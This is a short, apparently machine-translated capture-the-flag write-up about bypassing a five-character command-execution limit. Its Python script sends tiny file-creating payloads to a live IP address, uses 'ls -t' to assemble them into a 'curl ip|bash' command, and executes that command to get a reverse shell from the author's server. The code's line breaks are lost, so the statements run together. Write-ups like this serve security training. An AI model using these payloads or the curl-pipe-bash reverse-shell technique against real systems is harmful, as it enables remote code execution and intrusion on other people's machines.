The CTF command execution subject their thinking

CTF has a command execution vulnerability problem, and the single input character must not exceed 5.

Using Linux-specific commands to write shell bounces.

The principle is to use many methods such as curl ip|bash to bounce the shell.

import requestsfrom time import sleepfrom urllib.parse import quotepayload = [# generate `ls -t>g` file'>ls\\','ls>_','>\ \\','>-t\\','>\>g','ls>>_',# generate `curl orange.tw.tw|python`# generate `curl 10.188.2.20|bash`'>sh\ ','>ba\\','>\|\\',# '>03\\',# '>90\\','>0\\','>20\\','>1.\\','>12\\' ,'>7.\\','>10\\' ,'>9.\\','>3\\','>\ \\','>rl\\','>cu\\',#exec'sh_','sh g',]r = requests.get('http://120.79.33.253:9003/?reset=1')for i in payload:assert len(i) <= 5r = requests.get('http://120.79.33.253:9003/?cmd=' + quote(i) )print(i)sleep(0.2)

Put a bash sentence in your own server, and use curl ip|bash to bounce the shell.

Enable monitoring, and the shell can be bounced after execution.

Using linux file writing skills:

ls -t >g is the reverse output file name, then sh _ executes the file and writes it to g

You can see that the file has curl xx.x.x.x|bash characters. Entering any character under linux and adding \ will not interrupt the current operation, and you can continue to enter the content.If there is no \ behind it, it will be interrupted, and sh can still execute executable commands in the case of an error, so it will not affect the execution of curl.